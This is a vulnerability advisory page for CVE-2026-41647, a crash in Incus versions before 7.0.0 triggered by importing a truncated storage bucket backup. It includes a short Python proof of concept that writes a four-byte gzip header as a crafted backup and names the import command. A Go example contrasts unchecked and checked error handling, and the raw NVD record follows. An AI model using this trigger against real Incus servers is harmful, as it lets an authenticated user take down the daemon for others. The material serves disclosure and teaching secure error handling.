Security Vulnerability Report
CVE-2026-41647 CVSS 6.5 MEDIUM

CVE-2026-41647

Published: 2026-05-07 14:16:03
Last Modified: 2026-05-07 19:52:14

Description

Incus is a system container and virtual machine manager. In versions prior to 7.0.0, missing error handling allows an authenticated Incus user to crash the daemon by importing a truncated storage bucket backup file; NVD classifies the weakness as CWE-476 (NULL pointer dereference). Only availability is affected (CVSS vector C:N/I:N/A:H). The issue is patched in version 7.0.0.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:linuxcontainers:incus:*:*:*:*:*:*:*:* - VULNERABLE
Incus < 7.0.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# Proof of Concept for CVE-2026-41647
# This script demonstrates how a truncated storage bucket backup
# might trigger the crash in vulnerable Incus versions (< 7.0.0).

# Create a dummy truncated file acting as a backup
malicious_file = "truncated_bucket_backup.tar.gz"
with open(malicious_file, "wb") as f:
    # Write only the first four bytes of a gzip header to simulate a
    # truncated/corrupt backup: magic (1f 8b), method (08), flags (00).
    f.write(b"\x1f\x8b\x08\x00")
    # The file is intentionally incomplete/truncated: no deflate body, no trailer.

print(f"[+] Created truncated backup file: {malicious_file}")

# The attacker would then use the Incus API or CLI to import this file.
# Example command (conceptual; check `incus storage bucket import --help`
# for the exact argument order on your version):
# incus storage bucket import <pool> <bucket> <malicious_file>
print("[+] To exploit: Use the Incus CLI/API to import this truncated backup.")
print("[+] Expected Result: Incus daemon crashes due to unhandled error.")
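The crash class the advisory describes, as an added Go example (Incus is written in Go). This is not Incus's code and does not reproduce its real bucket import path; the archive layout, the entry name and the function names are assumptions made for illustration. It shows the CWE-476 pattern the NVD entry points at: a backup importer that drops the error from gzip.NewReader receives a nil reader on a truncated upload and panics on the first read, while the checked version rejects the same bytes with an ordinary error. The "magic bytes only" input is the same four bytes the PoC script above writes to disk.

```go
package main

import (
	"archive/tar"
	"bytes"
	"compress/gzip"
	"errors"
	"fmt"
	"io"
)

// Constructed sample input: a tar.gz "backup" cut off after the first four
// bytes (gzip magic 1f 8b, method 08, flags 00), as in the PoC script.
var truncatedBackup = []byte{0x1f, 0x8b, 0x08, 0x00}

// buildValidBackup returns a small well-formed tar.gz archive for comparison.
// The entry name and content are made up for this example.
func buildValidBackup() []byte {
	var buf bytes.Buffer
	gz := gzip.NewWriter(&buf)
	tw := tar.NewWriter(gz)
	content := []byte("name: demo\n")
	hdr := &tar.Header{Name: "backup/index.yaml", Mode: 0600, Size: int64(len(content))}
	if err := tw.WriteHeader(hdr); err != nil {
		panic(err)
	}
	if _, err := tw.Write(content); err != nil {
		panic(err)
	}
	if err := tw.Close(); err != nil {
		panic(err)
	}
	if err := gz.Close(); err != nil {
		panic(err)
	}
	return buf.Bytes()
}

// listEntriesUnchecked is the vulnerable shape: the error from gzip.NewReader
// is discarded. On a truncated stream NewReader returns a nil *gzip.Reader,
// tar.NewReader wraps it without complaint, and the first Read dereferences
// the nil pointer. In a long-running daemon that panic is the crash.
func listEntriesUnchecked(backup []byte) []string {
	gz, _ := gzip.NewReader(bytes.NewReader(backup)) // error ignored
	tr := tar.NewReader(gz)
	var names []string
	for {
		hdr, err := tr.Next()
		if err != nil {
			break
		}
		names = append(names, hdr.Name)
	}
	return names
}

// listEntriesChecked is the hardened shape: every error is propagated, so a
// truncated or corrupt upload turns into an error response and the process
// keeps serving other requests.
func listEntriesChecked(backup []byte) ([]string, error) {
	gz, err := gzip.NewReader(bytes.NewReader(backup))
	if err != nil {
		return nil, fmt.Errorf("invalid backup archive: %w", err)
	}
	defer gz.Close()
	tr := tar.NewReader(gz)
	var names []string
	for {
		hdr, err := tr.Next()
		if errors.Is(err, io.EOF) {
			return names, nil // clean end of archive
		}
		if err != nil {
			return nil, fmt.Errorf("reading backup archive: %w", err)
		}
		names = append(names, hdr.Name)
	}
}

// crashes reports whether the unchecked importer panics on the given input.
func crashes(backup []byte) (panicked bool) {
	defer func() {
		if recover() != nil {
			panicked = true
		}
	}()
	listEntriesUnchecked(backup)
	return false
}

func main() {
	valid := buildValidBackup()
	halfCut := valid[:len(valid)/2] // intact gzip header, body cut short

	inputs := map[string][]byte{"valid archive": valid, "magic bytes only": truncatedBackup, "body cut short": halfCut}
	for name, input := range inputs {
		names, err := listEntriesChecked(input)
		fmt.Printf("%-17s unchecked panics=%-5v checked entries=%v err=%v\n", name, crashes(input), names, err)
	}
}
```

The "body cut short" case matters for the fix: a backup with a valid gzip header but a truncated body never hits the nil-reader path, so the unchecked importer does not panic on it, yet it is still garbage. Propagating every error, not just the one that happened to crash, is what makes the checked version reject both inputs the same way.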

References

https://github.com/lxc/incus/releases/tag/v7.0.0 (Patch, Product)
https://github.com/lxc/incus/security/advisories/GHSA-fwj8-62r8-8p8m (Exploit, Mitigation, Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-41647", "sourceIdentifier": "[email protected]", "published": "2026-05-07T14:16:03.020", "lastModified": "2026-05-07T19:52:13.737", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Incus is a system container and virtual machine manager. Prior to version 7.0.0, a missing error handling could lead an authenticated Incus user to cause a daemon crash through the import of a truncated storage bucket backup file. This issue has been patched in version 7.0.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-476"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:linuxcontainers:incus:*:*:*:*:*:*:*:*", "versionEndExcluding": "7.0.0", "matchCriteriaId": "CF8EBB4B-C1F0-44C5-B063-9CF8EB6E0972"}]}]}], "references": [{"url": "https://github.com/lxc/incus/releases/tag/v7.0.0", "source": "[email protected]", "tags": ["Patch", "Product"]}, {"url": "https://github.com/lxc/incus/security/advisories/GHSA-fwj8-62r8-8p8m", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}]}}